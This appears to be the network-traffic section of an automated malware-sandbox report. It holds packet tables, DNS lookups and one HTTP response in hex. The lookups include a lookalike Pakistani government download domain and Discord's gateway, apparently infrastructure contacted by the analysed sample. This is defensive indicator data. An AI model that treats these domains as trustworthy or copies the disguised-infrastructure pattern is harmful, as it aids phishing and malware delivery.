Sep 30, 2024 18:58:31.178909063 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.178920984 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.178942919 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.179229975 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179256916 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179296017 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.179310083 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179363012 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.179409027 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179466009 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.179481030 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179508924 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179553032 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179559946 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.179574013 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179610014 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.179619074 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179677010 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179702997 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.179735899 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179775000 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.179790020 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179795980 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.179807901 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179827929 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.179845095 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179902077 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.179915905 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.179991007 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.180054903 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.180069923 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.192603111 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.192651987 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.192692995 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.192694902 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.192712069 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.192748070 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.192933083 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.192985058 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.192991972 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.192998886 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.193015099 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.193051100 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.193078041 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.193125963 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.193205118 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.193218946 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.193295956 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.234443903 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.234525919 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.264959097 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.265006065 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.265037060 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.265045881 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.265075922 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.265634060 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.265701056 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.265703917 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.265719891 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.265762091 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.265764952 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.265784979 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.265795946 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.265818119 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.265866041 CEST	443	49722	188.114.97.3	192.168.2.8
Sep 30, 2024 18:58:31.265933037 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:31.266341925 CEST	49722	443	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:32.152065039 CEST	49725	443	192.168.2.8	162.159.135.234
Sep 30, 2024 18:58:32.152106047 CEST	443	49725	162.159.135.234	192.168.2.8
Sep 30, 2024 18:58:32.152185917 CEST	49725	443	192.168.2.8	162.159.135.234
Sep 30, 2024 18:58:32.152513981 CEST	49725	443	192.168.2.8	162.159.135.234
Sep 30, 2024 18:58:32.152528048 CEST	443	49725	162.159.135.234	192.168.2.8
Sep 30, 2024 18:58:32.611139059 CEST	443	49725	162.159.135.234	192.168.2.8
Sep 30, 2024 18:58:32.611206055 CEST	49725	443	192.168.2.8	162.159.135.234
Sep 30, 2024 18:58:32.613504887 CEST	49725	443	192.168.2.8	162.159.135.234
Sep 30, 2024 18:58:32.613526106 CEST	443	49725	162.159.135.234	192.168.2.8
Sep 30, 2024 18:58:32.613802910 CEST	443	49725	162.159.135.234	192.168.2.8
Sep 30, 2024 18:58:32.614847898 CEST	49725	443	192.168.2.8	162.159.135.234
Sep 30, 2024 18:58:32.655411005 CEST	443	49725	162.159.135.234	192.168.2.8
Sep 30, 2024 18:58:32.804477930 CEST	443	49725	162.159.135.234	192.168.2.8
Sep 30, 2024 18:58:32.804544926 CEST	443	49725	162.159.135.234	192.168.2.8
Sep 30, 2024 18:58:32.804600954 CEST	49725	443	192.168.2.8	162.159.135.234
Sep 30, 2024 18:58:32.805423021 CEST	49725	443	192.168.2.8	162.159.135.234
Sep 30, 2024 18:58:33.282917976 CEST	49720	80	192.168.2.8	188.114.97.3
Sep 30, 2024 18:58:35.650434017 CEST	49706	443	192.168.2.8	23.206.229.226
Sep 30, 2024 18:58:35.651321888 CEST	49706	443	192.168.2.8	23.206.229.226
Sep 30, 2024 18:58:35.651782036 CEST	49728	443	192.168.2.8	23.206.229.226
Sep 30, 2024 18:58:35.651834965 CEST	443	49728	23.206.229.226	192.168.2.8
Sep 30, 2024 18:58:35.651904106 CEST	49728	443	192.168.2.8	23.206.229.226
Sep 30, 2024 18:58:35.653863907 CEST	49728	443	192.168.2.8	23.206.229.226
Sep 30, 2024 18:58:35.653879881 CEST	443	49728	23.206.229.226	192.168.2.8
Sep 30, 2024 18:58:35.658318996 CEST	443	49706	23.206.229.226	192.168.2.8
Sep 30, 2024 18:58:35.659040928 CEST	443	49706	23.206.229.226	192.168.2.8
Sep 30, 2024 18:58:36.252650023 CEST	443	49728	23.206.229.226	192.168.2.8
Sep 30, 2024 18:58:36.252809048 CEST	49728	443	192.168.2.8	23.206.229.226
Sep 30, 2024 18:58:36.790719986 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:36.790755987 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:36.790816069 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:36.792089939 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:36.792100906 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:37.695569992 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:37.695641041 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:37.699248075 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:37.699255943 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:37.699510098 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:37.743098974 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:38.426830053 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:38.467403889 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:38.650250912 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:38.650273085 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:38.650279999 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:38.650293112 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:38.650321007 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:38.650362968 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:38.650401115 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:38.650439978 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:38.650440931 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:38.650453091 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:38.650486946 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:38.650494099 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:38.650930882 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:38.650990963 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:38.663230896 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:38.663255930 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:38.663270950 CEST	49729	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:58:38.663278103 CEST	443	49729	52.165.165.26	192.168.2.8
Sep 30, 2024 18:58:39.308058977 CEST	443	49719	142.250.186.132	192.168.2.8
Sep 30, 2024 18:58:39.308125019 CEST	443	49719	142.250.186.132	192.168.2.8
Sep 30, 2024 18:58:39.308252096 CEST	49719	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:58:39.310503960 CEST	49719	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:58:39.310524940 CEST	443	49719	142.250.186.132	192.168.2.8
Sep 30, 2024 18:58:55.410386086 CEST	49714	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:58:55.455415964 CEST	443	49714	203.101.184.118	192.168.2.8
Sep 30, 2024 18:58:55.457076073 CEST	443	49728	23.206.229.226	192.168.2.8
Sep 30, 2024 18:58:55.457185030 CEST	49728	443	192.168.2.8	23.206.229.226
Sep 30, 2024 18:59:10.316443920 CEST	443	49714	203.101.184.118	192.168.2.8
Sep 30, 2024 18:59:10.316673994 CEST	49714	443	192.168.2.8	203.101.184.118
Sep 30, 2024 18:59:15.232239962 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:15.232292891 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:15.232382059 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:15.265057087 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:15.265094042 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:15.973090887 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:15.973182917 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:15.978142977 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:15.978157043 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:15.978427887 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:15.979389906 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:16.023407936 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:16.689228058 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:16.689249992 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:16.689270020 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:16.689343929 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:16.689379930 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:16.689436913 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:16.692543030 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:16.692603111 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:16.692631960 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:16.692639112 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:16.692662001 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:16.692667007 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:16.692712069 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:16.692799091 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:16.692817926 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:16.692831039 CEST	49732	443	192.168.2.8	52.165.165.26
Sep 30, 2024 18:59:16.692837000 CEST	443	49732	52.165.165.26	192.168.2.8
Sep 30, 2024 18:59:19.616697073 CEST	80	49707	217.20.57.18	192.168.2.8
Sep 30, 2024 18:59:19.616854906 CEST	49707	80	192.168.2.8	217.20.57.18
Sep 30, 2024 18:59:28.776050091 CEST	49734	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:59:28.776089907 CEST	443	49734	142.250.186.132	192.168.2.8
Sep 30, 2024 18:59:28.776159048 CEST	49734	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:59:28.776366949 CEST	49734	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:59:28.776381969 CEST	443	49734	142.250.186.132	192.168.2.8
Sep 30, 2024 18:59:29.405807972 CEST	443	49734	142.250.186.132	192.168.2.8
Sep 30, 2024 18:59:29.407763958 CEST	49734	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:59:29.407787085 CEST	443	49734	142.250.186.132	192.168.2.8
Sep 30, 2024 18:59:29.408138037 CEST	443	49734	142.250.186.132	192.168.2.8
Sep 30, 2024 18:59:29.408544064 CEST	49734	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:59:29.408607960 CEST	443	49734	142.250.186.132	192.168.2.8
Sep 30, 2024 18:59:29.462176085 CEST	49734	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:59:39.308686018 CEST	443	49734	142.250.186.132	192.168.2.8
Sep 30, 2024 18:59:39.308757067 CEST	443	49734	142.250.186.132	192.168.2.8
Sep 30, 2024 18:59:39.308805943 CEST	49734	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:59:41.308166981 CEST	49734	443	192.168.2.8	142.250.186.132
Sep 30, 2024 18:59:41.308202982 CEST	443	49734	142.250.186.132	192.168.2.8
Sep 30, 2024 19:00:05.260615110 CEST	49708	80	192.168.2.8	188.114.97.3
Sep 30, 2024 19:00:05.608572006 CEST	49708	80	192.168.2.8	188.114.97.3
Sep 30, 2024 19:00:05.687963009 CEST	80	49708	188.114.97.3	192.168.2.8
Sep 30, 2024 19:00:05.688111067 CEST	80	49708	188.114.97.3	192.168.2.8
Sep 30, 2024 19:00:05.688172102 CEST	49708	80	192.168.2.8	188.114.97.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:58:21.568511009 CEST	56546	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:21.580779076 CEST	53	56546	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:21.736318111 CEST	56547	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:21.747786999 CEST	53	56547	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:21.751010895 CEST	56548	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:21.787338018 CEST	53	56548	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:21.787781954 CEST	56549	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:21.824881077 CEST	53	56549	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:21.825268984 CEST	56550	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:21.837192059 CEST	53	56550	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:21.837553978 CEST	56551	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:21.868504047 CEST	53	56551	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:21.941942930 CEST	56552	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:21.951627970 CEST	53	56552	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:21.953989983 CEST	56553	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:21.986352921 CEST	53	56553	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:21.986926079 CEST	56554	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:21.997402906 CEST	53	56554	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:21.997920036 CEST	56555	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:22.011620045 CEST	53	56555	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:22.011877060 CEST	56556	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:22.030313015 CEST	53	56556	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:24.310903072 CEST	50879	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:24.347410917 CEST	53	50879	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:24.886264086 CEST	60719	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:24.887777090 CEST	54421	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:25.075524092 CEST	53	49192	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:25.076553106 CEST	53	53762	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:25.231288910 CEST	53	54421	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:25.386668921 CEST	53	60719	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:26.100677013 CEST	53	63006	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:28.724821091 CEST	63546	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:28.724821091 CEST	53236	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:28.731875896 CEST	53	63546	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:28.731895924 CEST	53	53236	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:32.142822027 CEST	55033	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:58:32.151362896 CEST	53	55033	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:43.142417908 CEST	53	63408	1.1.1.1	192.168.2.8
Sep 30, 2024 18:58:58.147325039 CEST	138	138	192.168.2.8	192.168.2.255
Sep 30, 2024 18:59:02.110496044 CEST	53	55283	1.1.1.1	192.168.2.8
Sep 30, 2024 18:59:24.494415998 CEST	53	60301	1.1.1.1	192.168.2.8
Sep 30, 2024 18:59:24.627409935 CEST	53	58156	1.1.1.1	192.168.2.8
Sep 30, 2024 18:59:52.737497091 CEST	53	52497	1.1.1.1	192.168.2.8
Sep 30, 2024 19:00:37.786712885 CEST	53	63839	1.1.1.1	192.168.2.8
Sep 30, 2024 19:01:53.897855043 CEST	53	58434	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 18:58:21.568511009 CEST	192.168.2.8	1.1.1.1	0x3038	Standard query (0)	www.ministryof.gov.pk	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:21.736318111 CEST	192.168.2.8	1.1.1.1	0x1	Standard query (0)	1.1.1.1.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Sep 30, 2024 18:58:21.751010895 CEST	192.168.2.8	1.1.1.1	0x2	Standard query (0)	www.Elpson.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:21.787781954 CEST	192.168.2.8	1.1.1.1	0x3	Standard query (0)	www.Elpson.com	28	IN (0x0001)	false
Sep 30, 2024 18:58:21.825268984 CEST	192.168.2.8	1.1.1.1	0x4	Standard query (0)	www.Elpson.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:21.837553978 CEST	192.168.2.8	1.1.1.1	0x5	Standard query (0)	www.Elpson.com	28	IN (0x0001)	false
Sep 30, 2024 18:58:21.941942930 CEST	192.168.2.8	1.1.1.1	0x1	Standard query (0)	1.1.1.1.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Sep 30, 2024 18:58:21.953989983 CEST	192.168.2.8	1.1.1.1	0x2	Standard query (0)	www.mproton.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:21.986926079 CEST	192.168.2.8	1.1.1.1	0x3	Standard query (0)	www.mproton.com	28	IN (0x0001)	false
Sep 30, 2024 18:58:21.997920036 CEST	192.168.2.8	1.1.1.1	0x4	Standard query (0)	www.mproton.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:22.011877060 CEST	192.168.2.8	1.1.1.1	0x5	Standard query (0)	www.mproton.com	28	IN (0x0001)	false
Sep 30, 2024 18:58:24.310903072 CEST	192.168.2.8	1.1.1.1	0x8496	Standard query (0)	ministryofficedownloadcloudserver.screenpont.xyz	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:24.886264086 CEST	192.168.2.8	1.1.1.1	0x9d3a	Standard query (0)	pmo.gov.pk	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:24.887777090 CEST	192.168.2.8	1.1.1.1	0x84d4	Standard query (0)	pmo.gov.pk	65	IN (0x0001)	false
Sep 30, 2024 18:58:28.724821091 CEST	192.168.2.8	1.1.1.1	0xf94c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:28.724821091 CEST	192.168.2.8	1.1.1.1	0xdafa	Standard query (0)	www.google.com	65	IN (0x0001)	false
Sep 30, 2024 18:58:32.142822027 CEST	192.168.2.8	1.1.1.1	0xb4d4	Standard query (0)	gateway.discord.gg	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 18:58:21.580779076 CEST	1.1.1.1	192.168.2.8	0x3038	Name error (3)	www.ministryof.gov.pk	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:21.747786999 CEST	1.1.1.1	192.168.2.8	0x1	No error (0)	1.1.1.1.in-addr.arpa			PTR (Pointer record)	IN (0x0001)	false
Sep 30, 2024 18:58:21.787338018 CEST	1.1.1.1	192.168.2.8	0x2	Name error (3)	www.Elpson.com	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:21.824881077 CEST	1.1.1.1	192.168.2.8	0x3	Name error (3)	www.Elpson.com	none	none	28	IN (0x0001)	false
Sep 30, 2024 18:58:21.837192059 CEST	1.1.1.1	192.168.2.8	0x4	Name error (3)	www.Elpson.com	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:21.868504047 CEST	1.1.1.1	192.168.2.8	0x5	Name error (3)	www.Elpson.com	none	none	28	IN (0x0001)	false
Sep 30, 2024 18:58:21.951627970 CEST	1.1.1.1	192.168.2.8	0x1	No error (0)	1.1.1.1.in-addr.arpa			PTR (Pointer record)	IN (0x0001)	false
Sep 30, 2024 18:58:21.986352921 CEST	1.1.1.1	192.168.2.8	0x2	Name error (3)	www.mproton.com	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:21.997402906 CEST	1.1.1.1	192.168.2.8	0x3	Name error (3)	www.mproton.com	none	none	28	IN (0x0001)	false
Sep 30, 2024 18:58:22.011620045 CEST	1.1.1.1	192.168.2.8	0x4	Name error (3)	www.mproton.com	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:22.030313015 CEST	1.1.1.1	192.168.2.8	0x5	Name error (3)	www.mproton.com	none	none	28	IN (0x0001)	false
Sep 30, 2024 18:58:24.347410917 CEST	1.1.1.1	192.168.2.8	0x8496	No error (0)	ministryofficedownloadcloudserver.screenpont.xyz		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:24.347410917 CEST	1.1.1.1	192.168.2.8	0x8496	No error (0)	ministryofficedownloadcloudserver.screenpont.xyz		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:25.386668921 CEST	1.1.1.1	192.168.2.8	0x9d3a	No error (0)	pmo.gov.pk		203.101.184.118	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:28.731875896 CEST	1.1.1.1	192.168.2.8	0xf94c	No error (0)	www.google.com		142.250.186.132	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:28.731895924 CEST	1.1.1.1	192.168.2.8	0xdafa	No error (0)	www.google.com			65	IN (0x0001)	false
Sep 30, 2024 18:58:32.151362896 CEST	1.1.1.1	192.168.2.8	0xb4d4	No error (0)	gateway.discord.gg		162.159.135.234	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:32.151362896 CEST	1.1.1.1	192.168.2.8	0xb4d4	No error (0)	gateway.discord.gg		162.159.136.234	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:32.151362896 CEST	1.1.1.1	192.168.2.8	0xb4d4	No error (0)	gateway.discord.gg		162.159.130.234	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:32.151362896 CEST	1.1.1.1	192.168.2.8	0xb4d4	No error (0)	gateway.discord.gg		162.159.133.234	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:58:32.151362896 CEST	1.1.1.1	192.168.2.8	0xb4d4	No error (0)	gateway.discord.gg		162.159.134.234	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ministryofficedownloadcloudserver.screenpont.xyz

gateway.discord.gg

slscr.update.microsoft.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.8	49707	217.20.57.18	80

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 18:58:19.724209070 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:58:19 GMT Content-Type: application/vnd.ms-cab-compressed Content-Length: 4770 Connection: keep-alive Cache-Control: public,max-age=900 Last-Modified: Tue, 26 Sep 2023 18:01:51 GMT ETag: "746787a3f0d91:0" Ocn-Cache-Status: HIT Ocn-Requestid: 10000004a5767a06-2834332366-1 Ocn-Served-By: QLT Accept-Ranges: bytes Server: Qwilt X-OC-Service-Type: lo X-CID: 9 X-CCC: de Data Raw: 4d 53 43 46 00 00 00 00 a2 12 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 4f 00 00 00 01 00 01 00 c7 16 00 00 00 00 00 00 00 00 32 57 71 68 20 00 64 69 73 61 6c 6c 6f 77 65 64 63 65 72 74 2e 73 74 6c 00 17 05 a5 5e 4b 12 c7 16 43 4b cd 98 77 54 53 cb be c7 93 10 3a a1 77 a5 4b 27 b0 43 30 54 11 04 a5 89 80 42 68 d2 7b 09 a1 84 de 43 17 29 0a 2a 1c a4 aa 88 d2 a5 59 40 aa 94 03 28 88 14 29 0a 52 94 22 45 11 04 44 5e 36 9e e2 b9 f7 9c f5 de fb e3 ae 75 93 95 bd f7 7c 66 7e 33 93 99 df 6f be 33 1b 20 b2 b7 53 50 4b c4 6b c7 6f 23 a0 94 b0 02 22 7b 2d 09 55 c1 a0 50 14 03 80 a0 a0 b6 8d d7 86 3a 91 c1 61 50 72 08 40 a4 64 a4 a0 96 a4 80 c2 a1 44 79 1a 68 01 91 12 0a 10 29 f6 01 3a 0a 9a df 21 19 2f 5c 41 13 e2 06 f1 83 d8 41 3c 49 5f 3c 24 10 e2 04 71 84 68 90 ae be 10 02 c4 06 a2 0e f1 27 dd f1 10 13 88 37 89 db 91 9e 9d 48 14 05 81 40 60 54 d0 d7 4b ee 53 8c 25 e1 1c 08 59 34 